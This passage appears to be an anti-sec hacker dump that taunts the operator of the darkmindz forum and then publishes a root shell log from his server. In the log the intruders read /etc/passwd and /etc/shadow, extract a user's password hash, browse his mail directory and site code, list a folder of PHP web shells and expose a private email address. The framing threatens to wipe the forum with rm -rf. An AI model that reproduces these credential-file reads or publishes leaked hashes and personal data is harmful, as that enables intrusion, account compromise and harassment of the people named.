his anti-sec activities with his public internet "life". This has spared us the
trouble of needing to rm -rf /* his shit, so thx RoMeO, hope we can be friends.
We didn't want a good hax.log to go to waste so we decided to publish darkmindz
anyways.

RoMeO is a blackhat wannabe and gave us good lulz with astalavista, props to
that, but who the fuck is/was ssanz anyway and what's the point of spreading
anti-sec propaganda via imageshack? You can't enjoy the benefits of a blackhat
and run some retarded haxor forum at the same time pal, good to see that you
realized that. But in any case if you decide to put your shitty forum online
again, you will be rm'ed.

Here's what we found in darkmindz land.

root@www.darkmindz.com's password:
Last login: Sat May 23 03:39:06 2009 from cpe-76-175-20-182.socal.res.rr.com
ALERT! You are entering a secured area! Your IP and login information
have been recorded. System administration has been notified.
This system is restricted to authorized access only. All activities on
this system are recorded and logged. Unauthorized access will be fully
investigated and reported to the appropriate law enforcement agencies.

root@server2:~[root@server2 ~]# uname -a; id
Linux server2.hr-development.net 2.6.27.10-grsec #1 SMP Fri May 15 21:34:11 PDT 2009 x86_64 x86_64 x86_64 GNU/Linux
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel)
root@server2:~[root@server2 ~]# #who up in this mother fucker
root@server2:~[root@server2 ~]# cat /etc/passwd /etc/shadow
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
apache:x:100:500::/var/www:/bin/false
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
webapps:x:500:501::/var/www/html:/bin/bash
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
dovecot:x:104:104::/home/dovecot:/bin/bash
admin:x:501:502::/home/admin:/bin/bash
hrdev:x:502:503::/home/hrdev:/bin/false
keytraderz:x:504:505::/home/keytraderz:/bin/false
yourkicks:x:507:508::/home/yourkicks:/bin/false
aaa:x:508:509::/home/aaa:/bin/false
beyond:x:509:510::/home/beyond:/bin/false
hotglow:x:510:511::/home/hotglow:/bin/false
wheelglow:x:512:513::/home/wheelglow:/bin/false
penguin:x:513:514::/home/penguin:/bin/false
ntp:x:38:38::/etc/ntp:/sbin/nologin
furiogamin:x:516:517::/home/furiogamin:/bin/false
kaza:x:517:518::/home/kaza:/bin/false
pimpinjg:x:518:519::/home/pimpinjg:/bin/false
dakilla:x:521:522::/home/dakilla:/bin/false
bootroot:x:522:523::/home/bootroot:/bin/false
scraft758:x:525:526::/home/scraft758:/bin/false
hstrike:x:526:527::/home/hstrike:/bin/false
romeo:x:528:529::/home/romeo:/bin/false
xckx:x:529:530::/home/xckx:/bin/false
h3mod:x:530:531::/home/h3mod:/bin/false
clamav:x:533:534:Clam AntiVirus:/home/clamav:/bin/false
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
avahi-autoipd:x:105:105:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
hbxmike:x:535:536::/home/hbxmike:/bin/false
wtfsmilez:x:536:537::/home/wtfsmilez:/bin/false
haiobr:x:537:538::/home/haiobr:/bin/false
odin:x:538:539::/home/odin:/bin/false
sam:x:539:540::/home/sam:/bin/false
mrgod:x:540:541::/home/mrgod:/bin/false
pagewiz:x:541:542::/home/pagewiz:/bin/false
zer0:x:542:543::/home/zer0:/bin/false
dablitz:x:543:544::/home/dablitz:/bin/false
ristop:x:544:545::/home/ristop:/bin/false
bloo:x:545:546::/home/bloo:/bin/false
root@server2:~[root@server2 ~]# grep romeo /etc/shadow
romeo:$1$qx2sTgHs$VHb4bpwE.lRwBFDmjtwPx.:14353:0:99999:7:::
|
||
root@server2:~[root@server2 ~]# w
|
||
04:05:41 up 18:48, 1 user, load average: 0.34, 0.34, 0.23
|
||
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
|
||
root pts/0 cpe-76-1x5-xx-xx 03:39 26:24 0.00s 0.00s -bash
|
||
root@server2:~[root@server2 ~]# ls -al
total 30488
drwxr-x--- 11 root root 4096 May 23 02:47 .
drwx--x--x 25 root root 4096 May 22 09:26 ..
-rw------- 1 root root 1132 Mar 11 01:44 anaconda-ks.cfg
-rw-r--r-- 1 root root 0 May 20 17:26 authorized_keys2
-rwxr-xr-x 1 root root 10 May 23 03:02 .bash_history
-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
drwxrwxrwx 24 1000 1000 4096 Apr 28 14:55 clamav-0.95.1
-rw-r--r-- 1 root root 24260964 Apr 8 08:24 clamav-0.95.1.tar.gz
-rw-r--r-- 1 root root 171053 May 22 13:49 cleaned_shells_php.txt
drwxr-xr-x 4 root root 4096 Mar 18 00:50 .cpan
-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
-rw-r--r-- 1 root root 4 Jan 12 16:21 .custombuild
-rwxr-xr-x 1 root root 21171 Jan 13 14:13 da.cpanel.import.pl
-rw-r--r-- 1 root root 288 Mar 31 05:21 defaults.conf
drwxr-xr-x 2 root root 4096 Mar 23 19:03 export
-rw-r--r-- 1 root root 1155 May 15 22:15 f.c
drwxr-xr-x 3 root root 4096 May 12 20:35 forum
-rw-r--r-- 1 root root 265 May 14 15:19 ifconfig
drwxr-xr-x 2 root root 4096 Mar 23 19:03 import
-rw------- 1 root root 12288 Mar 27 04:26 .import.swp
-rw-r--r-- 1 root root 1724 Apr 1 18:53 initsec
-rw------- 1 root root 97 May 23 04:02 .lesshst
-rw-r--r-- 1 root root 27 May 23 02:35 load
-rw------- 1 root root 42 Feb 5 17:18 .my.cnf
-rw------- 1 root root 37 May 2 15:19 .mysql_history
-rw-r--r-- 1 root root 9 Mar 31 05:21 .mytop
drwxr-xr-x 16 webapps apache 4096 Apr 28 16:11 nmap-4.85BETA8
-rw-r--r-- 1 root root 6484436 Apr 21 14:38 nmap-4.85BETA8.tar.bz2
drwxr-xr-x 3 root root 4096 May 20 14:31 qurantine
-rw------- 1 root root 1024 Apr 2 18:01 .rnd
-rwxr-xr-x 1 root root 2024 Apr 28 14:44 scan.pl
drwx------ 2 root root 4096 May 20 15:00 .ssh
-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
-rw------- 1 root root 12288 May 23 03:02 .test.swp
drwxr-xr-x 2 root root 4096 May 14 14:00 tmp
-rwxr-xr-x 1 root root 47429 May 16 2008 tuning-primer.sh
root@server2:~[root@server2 ~]# cat .bash_history
exit
exit
root@server2:~[root@server2 ~]# #omg nmap, SECURE HOSTING
root@server2:~[root@server2 ~]# date
Sat May 23 04:06:57 PDT 2009
root@server2:~[root@server2 ~]# cd /home/romeo/
root@server2:/home/romeo[root@server2 romeo]# ls -al
total 44
drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 .
drwx--x--x 36 root root 4096 May 23 02:33 ..
drwx------ 2 romeo romeo 4096 Feb 17 16:07 backups
-rw-r--r-- 1 romeo romeo 33 Dec 22 09:57 .bash_logout
-rw-r--r-- 1 romeo romeo 176 Dec 22 09:57 .bash_profile
-rw-r--r-- 1 romeo romeo 124 Dec 22 09:57 .bashrc
-rw------- 1 romeo romeo 0 Feb 8 08:45 .clipboard.txt
drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 domains
drwxrwx--- 4 romeo mail 4096 Feb 17 16:07 imap
drwxrwx--- 5 romeo mail 4096 Dec 23 08:29 Maildir
lrwxrwxrwx 1 romeo romeo 35 Feb 17 16:07 public_html ->
./domains/darkmindz.com/public_html
-rw-r----- 1 romeo mail 34 Apr 19 16:26 .shadow
root@server2:/home/romeo[root@server2 romeo]# du -ch Maildir/
4.0K Maildir/tmp
68M Maildir/new
4.0K Maildir/cur
68M Maildir/
68M total
root@server2:/home/romeo[root@server2 romeo]# #nice, thanks
root@server2:/home/romeo[root@server2 romeo]# cd domains
root@server2:/home/romeo/domains[root@server2 domains]# ls -la
total 16
drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 .
drwx--x--x 6 romeo romeo 4096 Apr 22 15:51 ..
drwx--x--x 7 romeo romeo 4096 Feb 10 19:26 cybershade.org
drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 darkmindz.com
root@server2:/home/romeo/domains[root@server2 domains]# cd darkmindz.com
root@server2:/home/romeo/domains/darkmindz.com[root@server2 darkmindz.com]# ls
-la
total 40
drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 .
drwx--x--x 4 romeo romeo 4096 Dec 23 14:31 ..
drwxr-xr-x 2 romeo romeo 4096 Dec 22 09:57 .htpasswd
drwxr-xr-x 2 root root 4096 May 23 00:10 logs
drwx--x--x 3 romeo romeo 4096 Dec 22 09:57 public_ftp
drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 public_html
drwxr-xr-x 2 root root 4096 May 1 00:10 stats
-rw-r--r-- 1 romeo romeo 12151 Feb 9 09:01 view_topic.php
root@server2:/home/romeo/domains/darkmindz.com[root@server2 darkmindz.com]# cd
public_html/
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# ls -al
total 47264
drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 .
drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 ..
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 400.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 401.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 403.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 404.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 500.shtml
-rw-r--r-- 1 romeo romeo 5254 Feb 14 06:12 acp.php
-rw-r--r-- 1 romeo romeo 9757 Feb 14 06:12 ajax.php
-rw-r--r-- 1 romeo romeo 2118 Feb 14 06:12 articles.php
drwxr-xr-x 2 romeo romeo 4096 Mar 4 11:11 _beta
drwxrwxrwx 5 romeo romeo 4096 Mar 26 15:55 cache
drwxr-xr-x 2 romeo romeo 4096 Dec 22 09:57 cgi-bin
-rw-r--r-- 1 romeo romeo 5561 Feb 14 06:12 challenges.php
-rw-r--r-- 1 romeo romeo 2137 Feb 2 08:43 codebase.php
-rw-r--r-- 1 romeo romeo 17251 Jan 13 07:21 convertor.php
drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 core
-rw-r--r-- 1 romeo romeo 0 Jan 13 07:21 debug
-rw-r--r-- 1 romeo romeo 3266 Dec 22 22:59 eg.gif
-rw-r--r-- 1 romeo romeo 5036 Feb 27 17:58 forgotpass.php
-rw-r--r-- 1 romeo romeo 7107 Mar 1 11:30 forum.php
-rw-r--r-- 1 romeo romeo 2177 Jan 13 07:21 get_shouts.php
-rw-r--r-- 1 romeo romeo 1416102 Feb 17 14:24 halo.zip
-rw-r--r-- 1 romeo romeo 4546 Feb 19 14:07 .htaccess
-rw-r--r-- 1 romeo romeo 36 Jan 13 06:52 .htpasswd
drwxr-xr-x 4 romeo romeo 4096 Feb 8 20:35 images
drwxr-xr-x 2 romeo romeo 4096 Dec 22 22:20 img
-rw-r--r-- 1 romeo romeo 3998 Apr 19 16:40 index.php
-rw-r--r-- 1 romeo romeo 843 Feb 28 15:13 irc.php
drwxr-xr-x 3 romeo romeo 4096 Feb 7 13:38 language
-rw-r--r-- 1 romeo romeo 4103 Feb 19 14:05 latest_posts.php
-rwxrwxrwx 1 romeo romeo 7184 Feb 14 06:12 loader.php
-rw-r--r-- 1 romeo romeo 8398 Feb 14 06:12 login.php
-rwxr-xr-x 1 romeo romeo 13954 Sep 15 2006 logo.jpg
-rw-r--r-- 1 romeo romeo 3006 Feb 1 21:44 merge.php
drwxr-xr-x 20 romeo romeo 4096 Feb 12 13:44 modules
-rw-r--r-- 1 romeo romeo 10964 Feb 14 12:40 pastebin.php
-rw-r--r-- 1 romeo romeo 31019 Feb 14 06:12 post.bak.php
-rw-r--r-- 1 romeo romeo 35322 Feb 21 08:56 post.php
-rw-r--r-- 1 romeo romeo 2142 Feb 14 06:12 privatemessages.php
-rw-r--r-- 1 romeo romeo 9747 Feb 22 13:10 register.php
-rw-r--r-- 1 romeo romeo 7919 Mar 16 20:00 rss.php
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 scripts
-rw-r--r-- 1 romeo romeo 1065 Feb 14 06:12 search.php
-rw-r--r-- 1 romeo romeo 1838 Feb 14 06:12 settings.php
drwxr-xr-x 2 root root 4096 May 20 14:30 shell
-rw-r--r-- 1 romeo romeo 46487316 May 23 04:07 stress_test.txt
-rw-r--r-- 1 romeo romeo 994 Jan 13 07:22 swiigle_upload.php
drwxr-xr-x 5 romeo romeo 4096 Feb 7 13:38 template
-rw-r--r-- 1 romeo romeo 454 Jan 13 07:22 template.php
drwxr-xr-x 2 romeo romeo 4096 Feb 16 21:05 templates
-rw-r--r-- 1 romeo romeo 610 Feb 18 08:17 test.php
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 txt docs
-rw-r--r-- 1 romeo romeo 2708 Feb 14 06:12 ucp.php
-rw-r--r-- 1 romeo romeo 7789 Feb 14 06:12 view_group.bak.php
-rw-r--r-- 1 romeo romeo 8556 Mar 1 11:30 view_group.php
-rw-r--r-- 1 romeo romeo 876 Feb 14 06:12 view_profile.php
-rw-r--r-- 1 romeo romeo 12677 Feb 14 13:16 view_topic.bak.php
-rw-r--r-- 1 romeo romeo 12871 Mar 1 11:30 view_topic.php
-rw-r--r-- 1 romeo romeo 9571 Feb 14 06:12 windowed_options.php
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# ls -la scripts/
total 476
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 .
drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 ..
-rw-r--r-- 1 romeo romeo 4770 Jan 13 12:11 builder.js
-rw-r--r-- 1 romeo romeo 588 Jan 13 12:11 cli.js
-rw-r--r-- 1 romeo romeo 35851 Jan 13 12:12 controls.js
-rw-r--r-- 1 romeo romeo 35253 Jan 13 12:11 dragdrop.js
-rw-r--r-- 1 romeo romeo 38986 Jan 13 12:12 effects.js
-rw-r--r-- 1 romeo romeo 8663 Feb 14 12:40 functions.js
-rw-r--r-- 1 romeo romeo 6897 Jan 13 12:11 growl.js
-rw-r--r-- 1 romeo romeo 63854 Jan 13 12:11 lightwindow.js
-rw-r--r-- 1 romeo romeo 52665 Jan 13 12:12 php.min.js
-rw-r--r-- 1 romeo romeo 1457 Jan 13 12:11 pm.js
-rw-r--r-- 1 romeo romeo 1637 Jan 13 12:11 pngfix.js
-rw-r--r-- 1 romeo romeo 3261 Jan 13 12:11 proto.menu.js
-rw-r--r-- 1 romeo romeo 130380 Jan 13 12:12 prototype.js
-rw-r--r-- 1 romeo romeo 2733 Jan 13 12:11 register.js
-rw-r--r-- 1 romeo romeo 2711 Jan 13 12:11 scriptaculous.js
-rw-r--r-- 1 romeo romeo 121 Jan 13 12:11 shoutbox.js
-rw-r--r-- 1 romeo romeo 10296 Jan 13 12:12 slider.js
-rw-r--r-- 1 romeo romeo 1920 Jan 13 12:12 sound.js
-rw-r--r-- 1 romeo romeo 20197 Jan 13 12:12 unittest.js
-rw-r--r-- 1 romeo romeo 6145 Feb 14 12:40 user.php
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# ls -la shell/
total 1564
drwxr-xr-x 2 root root 4096 May 20 14:30 .
drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 ..
-rw-r--r-- 1 romeo romeo 1297 Feb 16 21:05 ajan.txt
-rw-r--r-- 1 romeo romeo 44210 Feb 16 21:06 b64.txt
-rw-r--r-- 1 romeo romeo 140 Feb 16 21:06 backdoor.txt
-rw-r--r-- 1 romeo romeo 11141 Feb 16 21:06 c101.txt
-rw-r--r-- 1 romeo romeo 1468 Feb 16 21:06 cmd.txt
-rw-r--r-- 1 romeo romeo 18519 Feb 16 21:06 codeanalyzer.txt
-rw-r--r-- 1 romeo romeo 114861 Feb 16 21:06 constance.txt
-rw-r--r-- 1 romeo romeo 40682 Feb 16 21:06 CrystalShell v.1.txt
-rw-r--r-- 1 romeo romeo 83029 Feb 16 21:06 CyberSpy5.txt
-rw-r--r-- 1 romeo romeo 43394 Feb 16 21:06 dC3 Security Crew Shell PRiV.txt
-rw-r--r-- 1 romeo romeo 111446 Feb 16 21:06 DxShell.1.0.txt
-rw-r--r-- 1 romeo romeo 39433 Feb 16 21:06 eko.txt
-rw-r--r-- 1 romeo romeo 38479 Feb 16 21:06 ELMALISEKER Backd00r.txt
-rw-r--r-- 1 romeo romeo 24829 Feb 16 21:06 GFS web-shell ver 3.1.7 -
PRiV8.txt
-rw-r--r-- 1 romeo romeo 2089 Feb 16 21:06 imageshell.JPG
-rw-r--r-- 1 romeo romeo 1768 Feb 16 21:06 index.php
-rw-r--r-- 1 romeo romeo 17440 Feb 16 21:06 kscript.txt
-rw-r--r-- 1 romeo romeo 2342 Feb 16 21:06 l0ger.txt
-rw-r--r-- 1 romeo romeo 1683 Feb 16 21:06 LocalLinuxExploitFinder.txt
-rw-r--r-- 1 romeo romeo 33796 Feb 16 21:06 Mysql interface v1.0.txt
-rw-r--r-- 1 romeo romeo 34398 Feb 16 21:06 mysql.txt
-rw-r--r-- 1 romeo romeo 38856 Feb 16 21:06 ntdaddy.txt
-rw-r--r-- 1 romeo romeo 124953 Feb 16 21:06 r57.txt
-rw-r--r-- 1 romeo romeo 103794 Feb 16 21:06 SnIpEr_SA Shell.txt
-rw-r--r-- 1 romeo romeo 7002 Feb 16 21:06 steg.txt
-rw-r--r-- 1 romeo romeo 139788 Feb 16 21:06 tdshell.txt
-rw-r--r-- 1 romeo romeo 70402 Feb 16 21:06 webadmin.txt
-rw-r--r-- 1 romeo romeo 5057 Feb 16 21:06 WinX Shell.txt
-rw-r--r-- 1 romeo romeo 2455 Feb 16 21:06 Worse Linux Shell.txt
-rw-r--r-- 1 romeo romeo 304936 Feb 16 21:06 x2300_mod.txt
-rw-r--r-- 1 romeo romeo 10418 Feb 16 21:06 XSSscan.py.txt
-rw-r--r-- 1 romeo romeo 10269 Feb 16 21:06 xx.txt
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# #ELEET
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# ls -al
total 47264
drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 .
drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 ..
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 400.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 401.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 403.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 404.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 500.shtml
-rw-r--r-- 1 romeo romeo 5254 Feb 14 06:12 acp.php
-rw-r--r-- 1 romeo romeo 9757 Feb 14 06:12 ajax.php
-rw-r--r-- 1 romeo romeo 2118 Feb 14 06:12 articles.php
drwxr-xr-x 2 romeo romeo 4096 Mar 4 11:11 _beta
drwxrwxrwx 5 romeo romeo 4096 Mar 26 15:55 cache
drwxr-xr-x 2 romeo romeo 4096 Dec 22 09:57 cgi-bin
-rw-r--r-- 1 romeo romeo 5561 Feb 14 06:12 challenges.php
-rw-r--r-- 1 romeo romeo 2137 Feb 2 08:43 codebase.php
-rw-r--r-- 1 romeo romeo 17251 Jan 13 07:21 convertor.php
drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 core
-rw-r--r-- 1 romeo romeo 0 Jan 13 07:21 debug
-rw-r--r-- 1 romeo romeo 3266 Dec 22 22:59 eg.gif
-rw-r--r-- 1 romeo romeo 5036 Feb 27 17:58 forgotpass.php
-rw-r--r-- 1 romeo romeo 7107 Mar 1 11:30 forum.php
-rw-r--r-- 1 romeo romeo 2177 Jan 13 07:21 get_shouts.php
-rw-r--r-- 1 romeo romeo 1416102 Feb 17 14:24 halo.zip
-rw-r--r-- 1 romeo romeo 4546 Feb 19 14:07 .htaccess
-rw-r--r-- 1 romeo romeo 36 Jan 13 06:52 .htpasswd
drwxr-xr-x 4 romeo romeo 4096 Feb 8 20:35 images
drwxr-xr-x 2 romeo romeo 4096 Dec 22 22:20 img
-rw-r--r-- 1 romeo romeo 3998 Apr 19 16:40 index.php
-rw-r--r-- 1 romeo romeo 843 Feb 28 15:13 irc.php
drwxr-xr-x 3 romeo romeo 4096 Feb 7 13:38 language
-rw-r--r-- 1 romeo romeo 4103 Feb 19 14:05 latest_posts.php
-rwxrwxrwx 1 romeo romeo 7184 Feb 14 06:12 loader.php
-rw-r--r-- 1 romeo romeo 8398 Feb 14 06:12 login.php
-rwxr-xr-x 1 romeo romeo 13954 Sep 15 2006 logo.jpg
-rw-r--r-- 1 romeo romeo 3006 Feb 1 21:44 merge.php
drwxr-xr-x 20 romeo romeo 4096 Feb 12 13:44 modules
-rw-r--r-- 1 romeo romeo 10964 Feb 14 12:40 pastebin.php
-rw-r--r-- 1 romeo romeo 31019 Feb 14 06:12 post.bak.php
-rw-r--r-- 1 romeo romeo 35322 Feb 21 08:56 post.php
-rw-r--r-- 1 romeo romeo 2142 Feb 14 06:12 privatemessages.php
-rw-r--r-- 1 romeo romeo 9747 Feb 22 13:10 register.php
-rw-r--r-- 1 romeo romeo 7919 Mar 16 20:00 rss.php
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 scripts
-rw-r--r-- 1 romeo romeo 1065 Feb 14 06:12 search.php
-rw-r--r-- 1 romeo romeo 1838 Feb 14 06:12 settings.php
drwxr-xr-x 2 root root 4096 May 20 14:30 shell
-rw-r--r-- 1 romeo romeo 46488303 May 23 04:08 stress_test.txt
-rw-r--r-- 1 romeo romeo 994 Jan 13 07:22 swiigle_upload.php
drwxr-xr-x 5 romeo romeo 4096 Feb 7 13:38 template
-rw-r--r-- 1 romeo romeo 454 Jan 13 07:22 template.php
drwxr-xr-x 2 romeo romeo 4096 Feb 16 21:05 templates
-rw-r--r-- 1 romeo romeo 610 Feb 18 08:17 test.php
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 txt docs
-rw-r--r-- 1 romeo romeo 2708 Feb 14 06:12 ucp.php
-rw-r--r-- 1 romeo romeo 7789 Feb 14 06:12 view_group.bak.php
-rw-r--r-- 1 romeo romeo 8556 Mar 1 11:30 view_group.php
-rw-r--r-- 1 romeo romeo 876 Feb 14 06:12 view_profile.php
-rw-r--r-- 1 romeo romeo 12677 Feb 14 13:16 view_topic.bak.php
-rw-r--r-- 1 romeo romeo 12871 Mar 1 11:30 view_topic.php
-rw-r--r-- 1 romeo romeo 9571 Feb 14 06:12 windowed_options.php
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# cat test.php
<?php
/*======================================================================*\
| Cybershade CMS - Your CMS, Your Way |
\*======================================================================*/
define('INDEX_CHECK', 1);
define('CMS_DEBUG', 0);
define('CMS_MENU', 'forum');
$cms_root = '';
$page_name = '';
include "core/core.php";

$breadcrumb = array(
);

include "core/page_header.php";

mail("crawleruk@gmail.com", 'test', "mail() sent msg");
mailer("crawleruk@gmail.com", 'noreply@darkmindz.com', 'test', 'mailer() sent
msg');

include "core/page_footer.php";
?>root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# ls -la
total 47264
drwxr-xr-x 15 romeo romeo 4096 May 20 14:30 .
drwx--x--x 7 romeo romeo 4096 Apr 22 15:53 ..
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 400.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 401.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 403.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 404.shtml
-rwxr-xr-x 1 romeo romeo 515 May 7 2007 500.shtml
-rw-r--r-- 1 romeo romeo 5254 Feb 14 06:12 acp.php
-rw-r--r-- 1 romeo romeo 9757 Feb 14 06:12 ajax.php
-rw-r--r-- 1 romeo romeo 2118 Feb 14 06:12 articles.php
drwxr-xr-x 2 romeo romeo 4096 Mar 4 11:11 _beta
drwxrwxrwx 5 romeo romeo 4096 Mar 26 15:55 cache
drwxr-xr-x 2 romeo romeo 4096 Dec 22 09:57 cgi-bin
-rw-r--r-- 1 romeo romeo 5561 Feb 14 06:12 challenges.php
-rw-r--r-- 1 romeo romeo 2137 Feb 2 08:43 codebase.php
-rw-r--r-- 1 romeo romeo 17251 Jan 13 07:21 convertor.php
drwxr-xr-x 6 romeo romeo 4096 Feb 7 13:38 core
-rw-r--r-- 1 romeo romeo 0 Jan 13 07:21 debug
-rw-r--r-- 1 romeo romeo 3266 Dec 22 22:59 eg.gif
-rw-r--r-- 1 romeo romeo 5036 Feb 27 17:58 forgotpass.php
-rw-r--r-- 1 romeo romeo 7107 Mar 1 11:30 forum.php
-rw-r--r-- 1 romeo romeo 2177 Jan 13 07:21 get_shouts.php
-rw-r--r-- 1 romeo romeo 1416102 Feb 17 14:24 halo.zip
-rw-r--r-- 1 romeo romeo 4546 Feb 19 14:07 .htaccess
-rw-r--r-- 1 romeo romeo 36 Jan 13 06:52 .htpasswd
drwxr-xr-x 4 romeo romeo 4096 Feb 8 20:35 images
drwxr-xr-x 2 romeo romeo 4096 Dec 22 22:20 img
-rw-r--r-- 1 romeo romeo 3998 Apr 19 16:40 index.php
-rw-r--r-- 1 romeo romeo 843 Feb 28 15:13 irc.php
drwxr-xr-x 3 romeo romeo 4096 Feb 7 13:38 language
-rw-r--r-- 1 romeo romeo 4103 Feb 19 14:05 latest_posts.php
-rwxrwxrwx 1 romeo romeo 7184 Feb 14 06:12 loader.php
-rw-r--r-- 1 romeo romeo 8398 Feb 14 06:12 login.php
-rwxr-xr-x 1 romeo romeo 13954 Sep 15 2006 logo.jpg
-rw-r--r-- 1 romeo romeo 3006 Feb 1 21:44 merge.php
drwxr-xr-x 20 romeo romeo 4096 Feb 12 13:44 modules
-rw-r--r-- 1 romeo romeo 10964 Feb 14 12:40 pastebin.php
-rw-r--r-- 1 romeo romeo 31019 Feb 14 06:12 post.bak.php
-rw-r--r-- 1 romeo romeo 35322 Feb 21 08:56 post.php
-rw-r--r-- 1 romeo romeo 2142 Feb 14 06:12 privatemessages.php
-rw-r--r-- 1 romeo romeo 9747 Feb 22 13:10 register.php
-rw-r--r-- 1 romeo romeo 7919 Mar 16 20:00 rss.php
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 scripts
-rw-r--r-- 1 romeo romeo 1065 Feb 14 06:12 search.php
-rw-r--r-- 1 romeo romeo 1838 Feb 14 06:12 settings.php
drwxr-xr-x 2 root root 4096 May 20 14:30 shell
-rw-r--r-- 1 romeo romeo 46488756 May 23 04:08 stress_test.txt
-rw-r--r-- 1 romeo romeo 994 Jan 13 07:22 swiigle_upload.php
drwxr-xr-x 5 romeo romeo 4096 Feb 7 13:38 template
-rw-r--r-- 1 romeo romeo 454 Jan 13 07:22 template.php
drwxr-xr-x 2 romeo romeo 4096 Feb 16 21:05 templates
-rw-r--r-- 1 romeo romeo 610 Feb 18 08:17 test.php
drwxr-xr-x 2 romeo romeo 4096 Feb 7 13:38 txt docs
-rw-r--r-- 1 romeo romeo 2708 Feb 14 06:12 ucp.php
-rw-r--r-- 1 romeo romeo 7789 Feb 14 06:12 view_group.bak.php
-rw-r--r-- 1 romeo romeo 8556 Mar 1 11:30 view_group.php
-rw-r--r-- 1 romeo romeo 876 Feb 14 06:12 view_profile.php
-rw-r--r-- 1 romeo romeo 12677 Feb 14 13:16 view_topic.bak.php
-rw-r--r-- 1 romeo romeo 12871 Mar 1 11:30 view_topic.php
-rw-r--r-- 1 romeo romeo 9571 Feb 14 06:12 windowed_options.php
root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# less ucp.php
<?php
/*======================================================================*\
| Cybershade CMS - Your CMS, Your Way |
\*======================================================================*/
define('INDEX_CHECK', 1);
define('CMS_DEBUG', 0);
define('CMS_MENU', 'ucp');
$cms_root = '';
$page_name = 'Profile';
include $cms_root."core/core.php";
if (!$_user->is_online){redirect("/".root()."index.php");}

$mode = isset($_GET['settings']) ? secureit($_GET['settings']) : 'default';
$auid = (int)isset($_GET['uid']) ? $_GET['uid'] : '';
$switch = isset($_GET['action']) ? $_GET['action'] : '';

$uid = $config['global']['user']['id'];
if((int)isset($_GET['uid']) &&
$_user->check_permissions($config['global']['user
']['id'], ($mode!='avatar' ? GMOD : MOD)) ){
$uid = (int)$_GET['uid'];
}else{
$uid = $config['global']['user']['id'];
ucp.php root@server2:/home/romeo/domains/darkmindz.com/public_html[root@server2
public_html]# cd core
